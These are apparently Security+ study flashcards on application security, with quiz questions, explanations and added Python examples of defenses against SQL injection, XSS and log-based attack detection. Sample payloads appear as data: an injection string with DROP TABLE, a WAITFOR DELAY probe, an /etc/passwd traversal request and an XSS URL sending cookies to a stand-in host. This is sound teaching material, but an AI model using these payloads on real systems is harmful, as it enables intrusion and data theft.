Ch.6 Application Security Flashcards

1
Q

Adam is conducting software testing by reviewing the source code of the application. What type of code testing is Adam conducting?

A. Mutation testing
B. Static code analysis
C. Dynamic code analysis
D. Fuzzing

A

✅ B. Static code analysis – This method reviews the application’s source code without executing it to detect potential vulnerabilities.

❌ A. Mutation testing – Tests the effectiveness of test cases by intentionally altering code.
❌ C. Dynamic code analysis – Involves executing the application.
❌ D. Fuzzing – Sends random or invalid data to the application to uncover flaws.

💡 Security+ Tip:
If the question mentions code review without execution, it’s referring to static code analysis. If the code is running during the test, it’s dynamic.

2
Q

Charles is worried about users conducting SQL injection attacks. Which of the following solutions will best address his concerns?

A. Using secure session management
B. Enabling logging on the database
C. Performing user input validation
D. Implementing TLS

A

✅ C. Performing user input validation – Rejecting any input that does not match the expected format (an allowlist of length, type, and permitted characters) keeps attacker-supplied SQL syntax from ever reaching the query. In practice it is paired with parameterized queries, which remove the problem structurally.

❌ A. Using secure session management – Helps protect sessions, not SQL queries.
❌ B. Enabling logging on the database – Useful for detection, but not prevention.
❌ D. Implementing TLS – Encrypts data in transit but doesn’t protect against injections.

💡 Security+ Tip:
SQL injection prevention almost always points to input validation or parameterized queries. Look for phrases like user input or malformed SQL.

3
Q

Precompiled SQL statements that only require variables to be input are an example of what type of application security control?

A. Parameterized queries
B. Encoding data
C. Input validation
D. Appropriate access controls

A

✅ A. Parameterized queries – The SQL text is compiled with placeholders first and the user's values are bound afterwards, so input is only ever treated as data and cannot change the structure of the query.

❌ B. Encoding data – Useful for XSS, not SQL injection.
❌ C. Input validation – Validates input but doesn’t structure the query like parameterization does.
❌ D. Appropriate access controls – Manages user privileges, not query structure.

💡 Security+ Tip:
When the question mentions precompiled statements or separating input from SQL, the answer is almost always parameterized queries.
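A worked example of the two defenses the last two questions turn on (input validation and parameterized queries), added here and not taken from the book: a Python script using the standard-library sqlite3 driver against a constructed in-memory table. The table, column, and function names are the example's own.

```python
import re
import sqlite3

def build_db() -> sqlite3.Connection:
    # Constructed sample table; the names are the example's own.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT, status TEXT)")
    conn.executemany("INSERT INTO services VALUES (?, ?, ?)",
                     [(892, "billing", "up"), (893, "payroll", "down"), (894, "vpn", "up")])
    return conn

def status_vulnerable(conn: sqlite3.Connection, service_id: str) -> list:
    # BAD: the value is spliced into the SQL text, so a quote in the input
    # closes the literal and whatever follows becomes part of the query.
    sql = f"SELECT id, name, status FROM services WHERE id = '{service_id}'"
    return conn.execute(sql).fetchall()

def status_parameterized(conn: sqlite3.Connection, service_id) -> list:
    # GOOD: the statement is compiled with a placeholder and the value is bound
    # afterwards, so it is compared as data and can never alter the query.
    sql = "SELECT id, name, status FROM services WHERE id = ?"
    return conn.execute(sql, (service_id,)).fetchall()

SERVICE_ID = re.compile(r"[0-9]{1,9}")

def validate_service_id(raw: str) -> int:
    # Allowlist validation: a service ID is one to nine digits and nothing else.
    if not SERVICE_ID.fullmatch(raw):
        raise ValueError(f"rejected serviceID {raw!r}")
    return int(raw)

def lookup(conn: sqlite3.Connection, raw: str) -> list:
    # Both controls together: validate first, then bind the value.
    return status_parameterized(conn, validate_service_id(raw))

def demo() -> tuple:
    conn = build_db()
    payload = "892' OR '1'='1"                       # classic tautology injection
    leaked = status_vulnerable(conn, payload)        # every row comes back
    bound = status_parameterized(conn, payload)      # no row has that literal id
    try:
        lookup(conn, payload)
        rejected = False
    except ValueError:
        rejected = True
    return len(leaked), len(bound), rejected, lookup(conn, "892")
```

Calling demo() shows the contrast: the concatenated query returns all three rows for the tautology payload, the parameterized query returns none, and the allowlist rejects the payload before it reaches the database. Note that sqlite3's execute() refuses stacked statements, so a "; DROP TABLE" payload would not demonstrate well here; other drivers and databases do allow stacking, which is why the real fix is structural (placeholders) rather than a keyword filter.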

4
Q

During a web application test, Ben discovers that the application shows SQL code as part of an error provided to application users. What should he note in his report?
A. Improper error handling
B. Code exposure
C. SQL injection
D. A default configuration issue

A

✅ A. Improper error handling – Revealing internal code or SQL errors to users is a security risk and poor coding practice.

❌ B. Code exposure – Not a standard term for this specific issue.
❌ C. SQL injection – Leaked SQL helps an attacker probing for injection, but the behavior observed (error detail shown to users) is itself a disclosure finding about error handling, not proof that injection is possible.
❌ D. A default configuration issue – This is too vague and not specific to error messages.

💡 Security+ Tip:
If the system reveals technical details or internal code in error messages, it’s usually a question about improper error handling.

5
Q

The application that Scott is writing has a flaw that occurs when two operations are attempted at the same time, resulting in unexpected results when the two actions do not occur in the expected order. What type of flaw does the application have?

A. Dereferencing
B. A race condition
C. An insecure function
D. Improper error handling

A

✅ B. A race condition – This happens when the timing or order of operations affects the result, creating a security flaw.

❌ A. Dereferencing – Refers to following a pointer incorrectly (for example a null-pointer dereference), not to timing.
❌ C. An insecure function – Refers to calling a function known to be unsafe (for example an unbounded string copy), not to the ordering of concurrent operations.
❌ D. Improper error handling – Involves revealing sensitive info, not timing.

💡 Security+ Tip:
If the question mentions issues with timing or sequence of events, especially with concurrent operations, think race condition.

6
Q

Every time Susan checks code into her organization’s code repository, it is tested and validated, and then if accepted, it is immediately put into production. What is the term for this?

A. Continuous integration
B. Continuous delivery
C. A security nightmare
D. Agile development

A

✅ B. Continuous delivery – Refers to automated build, test, and release processes that push validated code into production.

❌ A. Continuous integration – Only includes building and testing, not deployment.
❌ C. A security nightmare – Not a real term.
❌ D. Agile development – A methodology, not a deployment process.

💡 Security+ Tip:
If code is automatically deployed to production after testing, the exam calls it continuous delivery; if the pipeline stops at build and test, it's continuous integration. Outside the exam many teams reserve continuous deployment for the fully automatic push to production and use continuous delivery to mean every build is release-ready, so read the answer choices as the book defines them.

7
Q

Tim is working on a change to a web application used by his organization to fix a known bug. What environment should he be working in?

A. Test
B. Development
C. Staging
D. Production

A

✅ B. Development – This is where code is written and modified before it’s tested or staged.

❌ A. Test – Used after development to validate functionality.
❌ C. Staging – Mimics production for final checks.
❌ D. Production – Live environment; changes shouldn’t be made directly here.

💡 Security+ Tip:
If the question involves coding or bug fixing, the correct environment is usually development.

8
Q

Ricky is concerned that developers in his organization make use of third-party code in their applications, which may introduce unknown vulnerabilities. He is concerned about the risk of the organization running code that it is not aware it is using. Which one of the following activities would best address this risk?

A. Web application firewalls
B. Package monitoring
C. Static analysis
D. Dynamic analysis

A

✅ B. Package monitoring – Tracks and monitors third-party libraries and dependencies for vulnerabilities or unauthorized changes.

❌ A. Web application firewalls – Protect against web attacks, not third-party code usage.
❌ C. Static analysis – Reviews code for flaws but doesn’t monitor external packages.
❌ D. Dynamic analysis – Tests running code, but doesn’t track package sources.

💡 Security+ Tip:
If the concern is third-party or hidden libraries, the answer is package monitoring: tracking which dependencies (and their transitive dependencies) are actually in use and watching them for new vulnerabilities, which is how software supply chain risk is managed. In practice this is the job of software composition analysis tooling working from a software bill of materials.

9
Q

Which one of the following is not an advantage of automation in cybersecurity operations?

A. Enforcing baselines
B. Technical debt
C. Employee retention
D. Standardizing infrastructure configurations

A

✅ B. Technical debt – This is a risk, not a benefit. It refers to outdated or unmaintained automation scripts causing long-term problems.

❌ A. Enforcing baselines – A benefit of automation.
❌ C. Employee retention – Automation helps reduce burnout.
❌ D. Standardizing infrastructure configurations – Another automation advantage.

💡 Security+ Tip:
If the answer is something negative or requiring long-term maintenance, it’s likely part of “Other Considerations”, not a benefit.

10
Q

Chris is creating a script that will automatically screen any user requests and flag those that exceed normal thresholds for manual review. What term best describes this automation use case?

A. User provisioning
B. Guard rails
C. Ticket creation
D. Escalation

A

✅ B. Guard rails – Guard rails are policy-enforcing scripts that prevent misconfigurations, violations, or abnormal activity.

❌ A. User provisioning – Refers to account and access automation.
❌ C. Ticket creation – Creates incidents or support tickets.
❌ D. Escalation – Notifies higher levels when issues need urgent attention.

💡 Security+ Tip:
If the question involves enforcing rules or preventing actions, think guard rails. If it involves creating accounts or tickets, that’s a different use case.

11
Q

Which one of the following is not a common drawback of automating cybersecurity operations?

A. Reducing employee satisfaction
B. Creating single points of failure
C. Costs
D. Complexity

A

✅ A. Reducing employee satisfaction – This is not a known drawback of automation. In fact, automation often improves satisfaction by removing repetitive tasks.

❌ B. Creating single points of failure – A valid risk if automation isn’t properly designed.
❌ C. Costs – Automation may involve high upfront investment.
❌ D. Complexity – Developing and managing automation requires technical skill.

💡 Security+ Tip:
Watch for answers that sound plausible but aren’t in the official list. Reducing employee satisfaction is not listed as a common automation drawback on the exam.

12
Q

Frank is investigating a security incident where the attacker entered a very long string into an input field, which was followed by a system command. What type of attack likely took place?

A. Cross-site request forgery
B. Server-side request forgery
C. Command injection
D. Buffer overflow

A

✅ D. Buffer overflow – The very long string overruns a fixed-size input buffer, and the bytes that follow it overwrite adjacent memory (saved return addresses, function pointers); the appended system command is the payload the attacker wanted run once control of execution was hijacked.

❌ A. Cross-site request forgery – Tricks a user into making an unintended request.
❌ B. Server-side request forgery – Forces a server to make a request on the attacker’s behalf.
❌ C. Command injection – Would also involve a system command, but it works by the application handing input to a shell and needs no over-long string; the excessive length is the clue that memory, not a shell, is the target.

💡 Security+ Tip:
If the scenario mentions excessive input size and memory manipulation, it’s most likely a buffer overflow.

13
Q

What type of attack places an attacker in the position to eavesdrop on communications between a user and a web server?

A. On-path attack
B. Session hijacking
C. Buffer overflow
D. Meet-in-the-middle

A

✅ A. On-path attack – Formerly known as man-in-the-middle, this attack lets the adversary intercept, alter, or observe communications between two systems.

❌ B. Session hijacking – Focuses on stealing session tokens, not necessarily listening in.
❌ C. Buffer overflow – A memory attack, unrelated to network traffic.
❌ D. Meet-in-the-middle – A cryptanalytic attack on multiple-encryption schemes (the reason double DES adds little strength over single DES), unrelated to eavesdropping on a connection.

💡 Security+ Tip:
If the attacker intercepts or relays communication between two parties, the exam is pointing to an on-path (MITM) attack.

14
Q

Tom is a software developer who creates code for sale to the public. He would like to assure his users that the code they receive actually came from him. What technique can he use to best provide this assurance?

A. Code signing
B. Code endorsement
C. Code encryption
D. Code obfuscation

A

✅ A. Code signing – Uses digital signatures to verify authenticity and integrity of code from a trusted source.

❌ B. Code endorsement – Not a real cryptographic term.
❌ C. Code encryption – Hides content but doesn’t prove origin.
❌ D. Code obfuscation – Makes code harder to reverse-engineer but doesn’t validate authorship.

💡 Security+ Tip:
If the question mentions verifying authorship or detecting tampered code, think code signing.

15
Q

Chris is reviewing evidence of a cross-site scripting attack where the attacker embedded JavaScript in a URL that a user clicked. The web page then sent the JavaScript to the user in the displayed page. What term best describes this attack?

A. Reflected XSS
B. Stored XSS
C. Persistent XSS
D. DOM-based XSS

A

✅ A. Reflected XSS – Occurs when the malicious script is reflected off a web server, typically via a URL, and sent back in the immediate response.

❌ B. Stored XSS – The malicious code is saved on the server and shown to multiple users.
❌ C. Persistent XSS – Another name for stored XSS.
❌ D. DOM-based XSS – The payload is executed purely in the browser via DOM manipulation.

💡 Security+ Tip:
If the script is delivered via a URL or link and not stored, it’s reflected XSS. Stored = persistent = saved on server.
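To make the reflected case concrete, here is an added Python example (not from the book) of a page that echoes a search term taken from the clicked URL, first unsafely and then with output encoding. The URL, host names, and page template are constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed page template: the search term is echoed back into the HTML.
PAGE = "<html><body><h1>Results for: {q}</h1></body></html>"

# Constructed link a victim might click; the q parameter carries a script that
# sends the page's cookies to an attacker-controlled host (hypothetical names).
CLICKED_URL = (
    "https://www.example.test/search?q="
    "%3Cscript%3Elocation%3D%27https%3A%2F%2Fevil.test%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"
)

def query_param(url: str, name: str) -> str:
    # First value of one query parameter, percent-decoded.
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]

def render_vulnerable(url: str) -> str:
    # BAD: attacker-controlled text is inserted into markup unchanged, so the
    # <script> element is reflected into the response and the browser runs it.
    return PAGE.format(q=query_param(url, "q"))

def render_encoded(url: str) -> str:
    # GOOD: HTML-encode at the point of output; < > & " ' become entities and
    # the payload is displayed as text instead of being parsed as an element.
    return PAGE.format(q=html.escape(query_param(url, "q"), quote=True))

def has_script_element(markup: str) -> bool:
    # Crude check used only to compare the two renderings above.
    return "<script" in markup.lower()
```

The encoded rendering shows the literal text &lt;script&gt; to the user, which is exactly what a search page should do with a term somebody typed. Encoding is context-specific: the same value placed inside a JavaScript string or a URL attribute needs that context's encoding, not html.escape.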

16
Q

Joe checks his web server logs and sees that someone sent the following query string to an application running on the server:
www.mycompany.com/servicestatus.php?serviceID=892&serviceID=892'%20;DROP%20TABLE%20Services;--
What type of attack was most likely attempted?

A. Cross-site scripting
B. Session hijacking
C. Parameter pollution
D. On-path

A

✅ C. Parameter pollution – The same parameter (serviceID) is supplied twice. Applications and the proxies in front of them differ in which copy they honor (first, last, or both concatenated), and the attacker is using that ambiguity to slip a second value carrying SQL syntax (a closing quote, a stacked DROP TABLE, and a -- comment) past any check that only inspects the first copy.

❌ A. Cross-site scripting – Targets browsers, not databases.
❌ B. Session hijacking – Involves stealing a session ID.
❌ D. On-path – Involves traffic interception, not query manipulation.

💡 Security+ Tip:
If multiple values are passed for the same parameter (e.g., serviceID=892&serviceID=892'), think parameter pollution, even when the extra value carries an injection payload.

17
Q

Upon further inspection, Joe finds a series of thousands of requests to the same URL coming from a single IP address. Here are a few examples:
www.mycompany.com/servicestatus.php?serviceID=1
www.mycompany.com/servicestatus.php?serviceID=2
www.mycompany.com/servicestatus.php?serviceID=3
What type of vulnerability was the attacker likely trying to exploit?

A. Insecure direct object reference
B. File upload
C. Unvalidated redirect
D. Session hijacking

A

✅ A. Insecure direct object reference – The attacker is enumerating resource IDs to gain unauthorized access to data via predictable URLs.

❌ B. File upload – Irrelevant to what the logs show.
❌ C. Unvalidated redirect – Involves redirecting users to malicious sites.
❌ D. Session hijacking – No evidence of session token theft.

💡 Security+ Tip:
If you see someone guessing or brute-forcing object IDs in a URL (like ?id=1 to ?id=9999), it’s likely an IDOR attack.

18
Q

Joe’s adventures in web server log analysis are not yet complete. As he continues to review the logs, he finds the request:
www.mycompany.com/../../../etc/passwd
What type of attack was most likely attempted?

A. SQL injection
B. Session hijacking
C. Directory traversal
D. File upload

A

✅ C. Directory traversal – The attacker is trying to navigate outside the intended directory structure to access sensitive files.

❌ A. SQL injection – Targets databases, not file paths.
❌ B. Session hijacking – Not related to file access.
❌ D. File upload – No uploading is shown here.

💡 Security+ Tip:
Look for ../ or ..\ sequences, including their URL-encoded forms (%2e%2e%2f) and double-encoded variants; they indicate directory traversal, especially when the target is a sensitive file like /etc/passwd.

19
Q

Wendy is a penetration tester who wishes to engage in a session hijacking attack. What information is crucial for Wendy to obtain if her attack will be successful?

A. Session ticket
B. Session cookie
C. Username
D. User password

A

✅ B. Session cookie – This identifies the user’s session and is required to hijack it.

❌ A. Session ticket – Refers to Kerberos tickets or TLS session-resumption tickets, not the web application's session identifier; it is not what a hijacker needs.
❌ C. Username – Useful, but not enough to hijack a session.
❌ D. User password – That would be credential theft, not session hijacking.

💡 Security+ Tip:
If the attack involves taking over an active session, the attacker needs the session cookie/token.

20
Q

Joe is examining the logs for his web server and discovers that a user sent input to a web application that contained the string WAITFOR. What type of attack was the user likely attempting?

A. Timing-based SQL injection
B. HTML injection
C. Cross-site scripting
D. Content-based SQL injection

A

✅ A. Timing-based SQL injection – WAITFOR DELAY is Microsoft SQL Server syntax that pauses the query for a set time. An attacker injects it so that a measurable delay in the response confirms the injected SQL executed, even when the page shows no error text or data (blind injection).

❌ B. HTML injection – This targets rendered web pages, not databases.
❌ C. Cross-site scripting – Involves JavaScript or HTML, not SQL commands.
❌ D. Content-based SQL injection – Relies on differences in error or content, not timing delays.

💡 Security+ Tip:
If you see WAITFOR DELAY (SQL Server), SLEEP() (MySQL), pg_sleep() (PostgreSQL), or BENCHMARK(), or responses that consistently arrive a fixed number of seconds late, it's a timing-based (blind) SQL injection attempt.
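The four log-analysis questions above (parameter pollution, ID enumeration, directory traversal, and the WAITFOR probe) are what a practitioner would actually triage from a server log. This added Python example, which is not from the book, runs those checks over a constructed log excerpt; the IP addresses, paths, thresholds, and finding labels are the example's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed web-server log excerpt (client IP, request target); not a real log.
LOG = """\
203.0.113.5 /servicestatus.php?serviceID=892&serviceID=892'%20;DROP%20TABLE%20Services;--
203.0.113.5 /servicestatus.php?serviceID=1
203.0.113.5 /servicestatus.php?serviceID=2
203.0.113.5 /servicestatus.php?serviceID=3
203.0.113.5 /servicestatus.php?serviceID=4
203.0.113.5 /servicestatus.php?serviceID=5
203.0.113.5 /../../../etc/passwd
198.51.100.7 /servicestatus.php?serviceID=7;WAITFOR%20DELAY%20'0:0:5'--
192.0.2.9 /servicestatus.php?serviceID=892
"""

TRAVERSAL = re.compile(r"\.\./|\.\.\\")
TIMING_SQL = re.compile(r"\b(WAITFOR\s+DELAY|SLEEP\s*\(|PG_SLEEP\s*\(|BENCHMARK\s*\()", re.I)
STACKED_SQL = re.compile(r"\b(DROP\s+TABLE|UNION\s+SELECT)\b", re.I)
ENUM_RUN = 5            # consecutive object IDs from one IP that count as enumeration
ID_PARAM = "serviceID"  # the object reference this application exposes

def fully_decode(text: str, rounds: int = 3) -> str:
    # Undo repeated percent-encoding (%252e -> %2e -> .) so a double-encoded
    # traversal does not slip past a single decode.
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(target: str) -> set:
    # Per-request checks; the enumeration check needs the whole log (see triage).
    findings = set()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if any(len(values) > 1 for values in params.values()):
        findings.add("parameter pollution")
    decoded = fully_decode(target)
    if TRAVERSAL.search(decoded):
        findings.add("directory traversal")
    if TIMING_SQL.search(decoded):
        findings.add("timing-based SQL injection")
    if STACKED_SQL.search(decoded):
        findings.add("SQL injection")
    return findings

def longest_consecutive_run(ids) -> int:
    best = run = 0
    previous = None
    for value in sorted(set(ids)):
        run = run + 1 if previous is not None and value == previous + 1 else 1
        best = max(best, run)
        previous = value
    return best

def triage(log_text: str) -> dict:
    # Returns {client_ip: set of findings}; clients with nothing suspicious are omitted.
    report = defaultdict(set)
    ids_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ip, _, target = line.partition(" ")
        report[ip] |= classify(target)
        for value in parse_qs(urlsplit(target).query).get(ID_PARAM, []):
            if value.isdigit():
                ids_by_ip[ip].append(int(value))
    for ip, ids in ids_by_ip.items():
        if longest_consecutive_run(ids) >= ENUM_RUN:
            report[ip].add("IDOR enumeration")
    return {ip: findings for ip, findings in report.items() if findings}
```

Run triage(LOG) to get one line of findings per suspicious client. The regexes are deliberately narrow and will miss obfuscated payloads; the point of the example is the shape of the analysis (decode first, look at parameter multiplicity, correlate across requests from the same source), not a production-grade signature set.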

21
Q

Explain difference between Static and Dynamic testing in Application Security

A

Static Testing analyzes code without executing it.
- It identifies vulnerabilities directly in the code.
- Often provides specific remediation suggestions to developers.

Dynamic Testing analyzes code while it is running.
- It tests all user-exposed interfaces with various inputs.
- Searches for vulnerabilities during execution.

22
Q

A security team is reviewing a newly developed application. To identify vulnerabilities before the code is executed, they choose a method that scans the source code and provides developers with direct feedback and remediation suggestions.

Which of the following BEST describes this type of testing?

A. Fuzz testing
B. Static analysis
C. Dynamic analysis
D. Penetration testing

A

✅ Correct Answer: B. Static analysis
Explanation:
Static analysis examines application source code without executing it. It’s used during the development phase to identify security vulnerabilities such as hardcoded credentials, unsafe function calls, or logic errors. This approach provides specific remediation guidance and allows developers to fix issues early in the software development lifecycle (SDLC).

❌ Incorrect Answers:
A. Fuzz testing – This is a type of dynamic testing that sends random or malformed input to an application to find vulnerabilities like crashes or buffer overflows. It requires code execution.
C. Dynamic analysis – This analyzes the application while it is running, interacting with its interfaces. It helps uncover vulnerabilities that might not be visible through static methods, such as authentication issues or logic flaws that occur during execution.
D. Penetration testing – This simulates real-world attacks to exploit vulnerabilities. It’s typically conducted after deployment, not during the development/testing phase, and is broader than static or dynamic analysis.

23
Q

A web application security analyst is investigating a report from a user who clicked on a blog comment and was immediately redirected to a fake login page that mimicked the company’s portal. The user had not installed any browser extensions, and the site is hosted on the company’s internal web server.

Which of the following is the MOST likely explanation for what occurred?

A. The attacker used a cross-site request forgery (CSRF) attack to trick the server into executing unauthorized commands.
B. The attacker exploited a buffer overflow vulnerability in the browser to gain remote code execution.
C. The attacker performed a SQL injection attack to retrieve stored login credentials.
D. The attacker performed a cross-site scripting attack to inject client-side code into the website.

A

✅ Correct Answer: D. The attacker performed a cross-site scripting attack to inject client-side code into the website.
Explanation:
This describes a stored XSS attack: the attacker embedded malicious script (here, a redirect) in the blog comment, the server saved it, and when the user viewed the page their browser executed it and navigated to the fake login page. The attack works because the browser trusts code served by the legitimate site; no extension or client compromise is needed, which is exactly what the scenario rules out.

❌ Incorrect Answers:
A. CSRF – Forces a logged-in user’s browser to make unwanted requests. It’s about exploiting trust between browser and server, not executing code in the browser.
B. Buffer overflow – This affects memory and system stability, often used for remote code execution, but not likely triggered by clicking a blog comment.
C. SQL injection – Targets the database, not the browser. It retrieves or manipulates stored data rather than executing a client-side redirect.

💡 Security+ Tip:
If the question involves malicious code executing in the user’s browser after visiting a legitimate site, think XSS. Even if the question doesn’t show code, focus on behavior like redirects, pop-ups, or data exfiltration happening on the client side.

24
Q

A developer is updating a customer-facing web application after a penetration test revealed that users could inject JavaScript into form fields and manipulate SQL queries using specially crafted input.

Which of the following would BEST help mitigate both types of attacks?

A. Implementing output encoding for web responses
B. Enforcing strong password policies
C. Performing input validation on all user-supplied data
D. Using HTTPS to encrypt traffic between clients and servers

A

✅ Correct Answer: C. Performing input validation on all user-supplied data
Explanation:
Input validation ensures that data entered by users conforms to expected formats and rejects malicious input such as embedded JavaScript (for XSS) or SQL syntax (for SQL injection). It is a core defense mechanism that protects against a wide range of input-based attacks.

❌ Incorrect Answers:
A. Output encoding – Helps mitigate XSS, but does not address SQL injection.
B. Strong password policies – Improve account security but don’t prevent injection attacks.
D. HTTPS encryption – Protects data in transit, but doesn’t validate or sanitize user input.

💡 Security+ Tip:
If a question asks how to defend against XSS and SQL injection, always think input validation. It’s one of the most fundamental and universal defenses against input-based web attacks.

25
Q

A web developer is designing a form for users to submit feedback on a company website. The developer adds JavaScript code to display real-time error messages when users leave required fields blank or exceed character limits. However, during a security assessment, a tester was able to bypass the form’s input checks and submit malicious JavaScript code to the server.

Which of the following BEST explains why the input checks failed to prevent the attack?

A. The form lacked proper encryption when transmitting data.
B. The server failed to use multifactor authentication.
C. The validation was implemented only on the client side.
D. The web server used a self-signed certificate.

A

✅ Correct Answer: C. The validation was implemented only on the client side.
Explanation:
Client-side validation (e.g., JavaScript input checks) can improve usability but cannot be trusted for security. Attackers can disable or bypass it and submit malicious input directly to the server. Server-side validation is essential for rejecting dangerous input like XSS or SQL injection attempts.

❌ Incorrect Answers:
A. Encryption (HTTPS) – Protects data in transit but doesn’t validate it.
B. Multifactor authentication – Controls access, not input validation.
D. Self-signed certificate – May raise trust issues but doesn’t impact input handling or validation.

💡 Security+ Tip:
If a question describes real-time input checks in the browser that fail to block malicious data, the answer is likely related to client-side validation. Always look for whether the server is properly sanitizing and validating inputs before processing.
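The two questions above make the same point from two sides: input validation is the broad defense against injection, and it only counts when the server does it. This added Python example, not from the book, is the server-side half of a feedback form whose browser-side JavaScript enforces the same rules; the field names, limits, and sample submissions are assumed for the example.

```python
import re

# Assumed form contract (hypothetical): the browser-side JavaScript enforces
# these same rules, but an attacker can skip the browser entirely, so the
# server re-checks every request independently.
REQUIRED = ("name", "email", "comment")
MAX_LEN = {"name": 60, "email": 254, "comment": 1000}
NAME = re.compile(r"[A-Za-z0-9 .'\-]+")                    # allowlist; no < > " or &
EMAIL = re.compile(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}")
CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")

def validate_feedback(form: dict) -> dict:
    """Return {field: reason} for every rule the submission breaks; {} means accept."""
    errors = {}
    for field in REQUIRED:
        value = form.get(field)
        if not isinstance(value, str) or not value.strip():
            errors[field] = "required"
        elif len(value) > MAX_LEN[field]:
            errors[field] = f"exceeds {MAX_LEN[field]} characters"
        elif CONTROL.search(value):
            errors[field] = "control characters not allowed"
    if "name" not in errors and not NAME.fullmatch(form["name"]):
        errors["name"] = "characters outside the allowed set"
    if "email" not in errors and not EMAIL.fullmatch(form["email"]):
        errors["email"] = "not a valid address"
    # The free-text comment cannot be allowlisted without breaking legitimate
    # input; it is bounded and checked here, and must still be output-encoded
    # (and bound as a query parameter in SQL) wherever it is used later.
    return errors

def accept_feedback(form: dict, store: list) -> bool:
    # Reject-on-any-error: nothing that fails validation is persisted.
    errors = validate_feedback(form)
    if errors:
        return False
    store.append({field: form[field].strip() for field in REQUIRED})
    return True

# Constructed submissions: one from the real form, one crafted with a command-line
# HTTP client that never ran the browser-side checks.
LEGIT = {"name": "Ann O'Neil", "email": "ann@example.test", "comment": "Great service."}
BYPASS = {"name": "<script>alert(1)</script>", "email": "ann@example.test",
          "comment": "A" * 5000}
```

The crafted submission fails two server-side rules regardless of what the JavaScript did or did not run. Note the division of labor in the comment field: length and character-class checks bound what is stored, but the stored text is still untrusted and gets encoded when rendered and bound as a parameter when queried.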

26
Q

A security engineer is designing the network layout for a company that will host multiple public-facing services, including a web server and a DNS server. The company wants to ensure these services are isolated from the internal network and that if one service is compromised, the internal environment remains protected.

The engineer proposes placing the public servers between two firewalls—one controlling traffic from the internet and another controlling access to the internal network.

Which of the following BEST describes this network architecture?

A. Screened subnet
B. Internal segmentation
C. Back-to-back firewall
D. VLAN trunking

A

✅ Correct Answer: C. Back-to-back firewall
This is the classic dual-firewall DMZ design:
- one firewall between the internet and the DMZ, admitting only the published services (HTTP/HTTPS to the web server, DNS to the name server);
- a second firewall between the DMZ and the internal network, allowing only the narrow set of connections the DMZ hosts genuinely need inward.
A compromised public server therefore still faces a second, separate policy before it can reach internal systems, and the two rule sets can be reviewed and changed independently.

❌ Incorrect Answers:
A. Screened subnet – The book distinguishes this as a single firewall with three interfaces (external, DMZ, internal). In broader usage the term covers any firewalled DMZ segment, including the two-firewall design, but the question's two-firewall clue is what points to the back-to-back answer.
B. Internal segmentation – Refers to isolating internal systems within a network, usually with VLANs or firewalls. It doesn’t involve public-facing servers in a DMZ.
D. VLAN trunking – Involves tagging multiple VLANs on a single physical link, typically between switches. It’s unrelated to DMZ architecture.

💡 Security+ Tip:
If the question mentions two firewalls with a DMZ in between, think "back-to-back firewall". If it describes a single firewall with three zones, go with "screened subnet". The key is how many firewalls are named and how the traffic is segmented; in real designs both are screened subnets, so let the question's wording decide.

27
Q

A security analyst deploys a system that runs unknown files in a restricted virtual environment. The goal is to observe their behavior without allowing access to production systems. During an investigation, the analyst discovers that an attacker was executing malware but was unknowingly confined to this controlled space, preventing damage to the rest of the network.

Which of the following BEST describes the technique used to contain the attacker?

A. Honeynet
B. Containerization
C. Virtual desktop infrastructure (VDI)
D. Sandbox

A

✅ Correct Answer: D. Sandbox
A sandbox is an isolated environment used to run untrusted code or applications safely. It’s often used for malware analysis or attack containment, where the attacker or malicious software believes it’s in a real environment but is actually restricted. This allows the defender to observe the behavior without risking production systems.

❌ Incorrect Answers:
A. Honeynet – A honeynet is a group of intentionally vulnerable systems used to attract attackers and study their tactics, but it’s not primarily used for containing execution of code like a sandbox.
B. Containerization – Containers isolate applications, but this refers more to application deployment and scalability, not deceptive isolation for attackers.
C. Virtual desktop infrastructure (VDI) – VDI delivers user desktops in virtual form, often for management and security, but it’s not specifically designed to trick attackers or isolate malware.

💡 Security+ Tip:
If a question mentions running untrusted or malicious code in an isolated environment for analysis or containment, think sandbox. If it involves luring attackers, it’s more likely a honeypot or honeynet.

28
Q

A security analyst is investigating a report that an internally developed application crashes when users submit excessively long input into a feedback form. Upon closer inspection, the analyst discovers that the excessive input causes the program to overwrite adjacent memory locations, resulting in unauthorized code execution.

Which of the following BEST describes this type of vulnerability?

A. Input validation
B. Buffer overflow
C. Memory leak
D. Command injection

A

✅ Correct Answer: B. Buffer overflow
A buffer overflow occurs when input exceeds the allocated memory space, overwriting adjacent memory. This can lead to crashes, data corruption, or remote code execution, especially when attackers inject and run their own code in memory.

❌ Incorrect Answers:
A. Input validation – This is a mitigation, not the vulnerability itself.
C. Memory leak – A memory leak occurs when memory isn’t released after use, leading to resource exhaustion — not code injection.
D. Command injection – That involves injecting OS commands, not overwriting memory directly.

💡 Security+ Tip:
If the question mentions overwriting memory or excessive input leading to a crash or code execution, it’s almost always a buffer overflow.

29
Q

A developer reports that a web application incorrectly allows a user to access restricted content immediately after their permissions have been revoked. The system checks the user’s access rights at login, but doesn’t verify access again when content is requested. As a result, users with active sessions may retain access longer than intended.

Which of the following BEST describes this vulnerability?

A. Privilege escalation
B. Session hijacking
C. Time-of-check to time-of-use (TOCTOU)
D. Broken authentication

A

✅ Correct Answer: C. Time-of-check to time-of-use (TOCTOU)
A TOCTOU race condition occurs when a system checks a condition (like access rights), but uses the result later without rechecking, during which time the condition may have changed. In this case, the user’s access was revoked, but the system never rechecked it before allowing resource access.

❌ Incorrect Answers:
A. Privilege escalation – That’s when a user gains higher access than authorized, not retaining access after revocation.
B. Session hijacking – Involves an attacker stealing a session token, not a timing flaw in access logic.
D. Broken authentication – Refers to flaws in verifying identity, not timing issues after login.

💡 Security+ Tip:
When a question involves access granted due to outdated or unchecked conditions, especially after login, it’s pointing to a TOCTOU race condition.

30
Q

